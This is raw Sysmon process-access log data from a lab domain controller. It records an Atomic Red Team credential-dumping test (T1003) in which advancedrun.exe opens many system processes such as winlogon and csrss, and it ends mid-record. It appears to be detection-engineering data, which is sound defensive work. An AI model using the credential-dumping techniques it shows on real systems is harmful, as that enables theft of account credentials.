17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003952014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 